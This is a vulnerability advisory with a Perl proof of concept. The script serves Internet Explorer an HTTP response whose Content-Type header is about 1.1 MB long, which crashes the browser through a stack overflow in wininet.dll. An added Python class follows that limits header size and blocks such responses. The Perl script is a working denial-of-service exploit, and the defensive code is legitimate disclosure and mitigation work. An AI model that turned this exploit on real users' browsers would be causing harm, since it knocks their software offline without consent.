Microsoft Internet Explorer Content-Type Denial Of Service Vulnerability

#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge (> ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#
# discovered by Firestorm
#
# Usage:
# 1) run this code
# 2) open http://127.0.0.1/ with IE
#

use IO::Socket;

# Listen on localhost:80 and accept a single client.
my $sock = IO::Socket::INET->new(Listen => 1,
    LocalAddr => 'localhost',
    LocalPort => 80,
    Proto => 'tcp');
die unless $sock;
$huge = "A" x 1100000;   # Content-Type value of about 1.1 MB
$| = 1;                  # unbuffered STDOUT
print ">http server started on port 80... try 'iexplore http://127.0.0.1/'\n";
$z = $sock->accept();
print ">connection!\n";
do
{
    $ln = <$z>;
    print $ln;
    chomp $ln;

    # A blank line marks the end of the request headers.
    if (($ln eq "") || ($ln eq "\n") || ($ln eq "\r"))
    {
        print ">sending response\n";
        print $z "HTTP/1.1 200 OK
Server: X3 1.0
Content-Type: $huge
Connection: close

done";
        close($z);
        exit;
    }
} while (1);
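
A proxy or HTTP client can reject this response without ever buffering the 1,100,000-byte header, by bounding header size while the bytes arrive. The Python scanner below is an added example, not part of the original advisory and not Microsoft's code; the 8 KB line limit, the 64 KB block limit and all names in it are assumptions chosen for illustration.

```python
MAX_LINE = 8192     # assumed cap for one header line, in bytes
MAX_BLOCK = 65536   # assumed cap for status line plus all headers

class HeaderLimitExceeded(Exception):
    pass

class ResponseHeaderGuard:
    """Scans response bytes as they arrive; stops before an oversized header is buffered."""
    def __init__(self, max_line=MAX_LINE, max_block=MAX_BLOCK):
        self.max_line, self.max_block = max_line, max_block
        self.line, self.lines = bytearray(), []
        self.total, self.done = 0, False

    def feed(self, chunk):
        """Consume one chunk; return True once the blank line ending the headers is seen."""
        for b in chunk:
            if self.done:
                break
            self.total += 1
            if self.total > self.max_block:
                raise HeaderLimitExceeded("header block over %d bytes" % self.max_block)
            if b == 0x0A:                      # LF ends a line; a trailing CR is stripped
                line = bytes(self.line).rstrip(b"\r")
                self.line.clear()
                if line:
                    self.lines.append(line)
                else:
                    self.done = True
            else:
                self.line.append(b)
                if len(self.line) > self.max_line:
                    name = bytes(self.line).split(b":", 1)[0][:64].decode("latin-1")
                    raise HeaderLimitExceeded("%s line over %d bytes" % (name, self.max_line))
        return self.done

def check_response(raw, chunk_size=4096):
    """Feed raw response bytes in chunks; return (verdict, detail, bytes_examined)."""
    guard = ResponseHeaderGuard()
    try:
        for i in range(0, len(raw), chunk_size):
            if guard.feed(raw[i:i + chunk_size]):
                return "ok", guard.lines, guard.total
    except HeaderLimitExceeded as exc:
        return "blocked", str(exc), guard.total
    return "incomplete", guard.lines, guard.total

# Constructed samples: a normal response and one shaped like the response sent above.
NORMAL = b"HTTP/1.1 200 OK\r\nServer: X3 1.0\r\nContent-Type: text/html\r\nConnection: close\r\n\r\ndone"
HUGE = b"HTTP/1.1 200 OK\r\nServer: X3 1.0\r\nContent-Type: " + b"A" * 1100000 + b"\r\nConnection: close\r\n\r\ndone"
```

`check_response(HUGE)` returns a `blocked` verdict after examining only a few kilobytes, so the rest of the header never reaches the parser behind the guard.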
